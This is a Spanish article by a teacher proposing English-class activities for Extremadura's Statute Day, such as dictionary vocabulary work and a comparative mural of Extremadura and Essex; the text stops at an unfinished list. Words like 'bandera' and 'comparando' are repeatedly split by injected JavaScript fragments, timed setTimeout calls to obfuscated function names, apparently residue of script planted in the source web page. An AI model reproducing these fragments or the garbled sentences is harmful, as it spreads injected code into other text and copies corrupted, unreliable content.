¿CÓMO CELEBRAR EL DÍA DEL ESTATUTO DE EXTREMADURA EN EL AULA DE INGLÉS?

Autora: María Benítez Sanz


          Como todos sabemos, todos los años por el mes de febrero se celebra el día de Estatuto de Extremadura. En este día, en los colegios suelen tener lugar celebraciones  y actividades relacionadas con nuestra comunidad como bailes regionales, teatros, se canta el himno de Extremadura, se hacen bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderas, etc. Pero ¿es posible celebrar este día en el aula de inglés? A través de este artículo veremos algunas de las actividades que podemos realizar para integrar el conocimiento de la realidad extremeña en el aula de idiomas.


 

Primera actividad: INTRODUCCIÓN DE CONCEPTOS

          La primera actividad que realizaremos será familiarizar a nuestros alumnos con los conceptos de bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andera, himno, folclore, comunidad, país, región y tradiciones. Así enseñaremos a nuestros alumnos estos conceptos en inglés correspondientes a estos términos: flag, anthem, folklore, community, region, country or traditions. Para ello, dividiremos a los alumnos en grupos de cuatro y entregaremos a cada uno de ellos un diccionario de inglés. Uno de ellos se encargará de buscar las palabras correspondientes a estos términos en inglés mientras los demás anotan en un pequeño cuaderno su equivalencia al inglés, por ejemplo: bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andera=flag.


 

Segunda actividad: COMPARACIÓN DE ELEMENTOS CULTURALES

          Con esta segunda actividad, pretenderemos realizar un mini-proyecto en grupo, donde los alumnos tendrán que buscar información en internet y otros recursos como enciclopedias, para hacer una comparación entre la comunidad extremeña y alguna región de Inglaterra por ejemplo.


          Como sabemos, Inglaterra es un país dentro de Gran Bretaña que está dividido en condados y no en comunidades como ocurre en España. Así, nuestros alumnos deberán aprender a apreciar estas diferencias comparandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los siguientes conceptos por ejemplo la comunidad de Extremadura dentro de España con el condado de Essex en Inglaterra.


          Para ello, la actividad propuesta, consistirá en que nuestros alumnos elaboren por grupos de cuatro un mural dividido en dos partes, donde ilustrarán y escribirán las diferencias culturales entre estas dos regiones. De esta forma los elementos que podrán incluir en el mural, serán los siguientes:


          Nuestros alumnos aprenderán a comparar los siguientes conceptos:


Bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderas: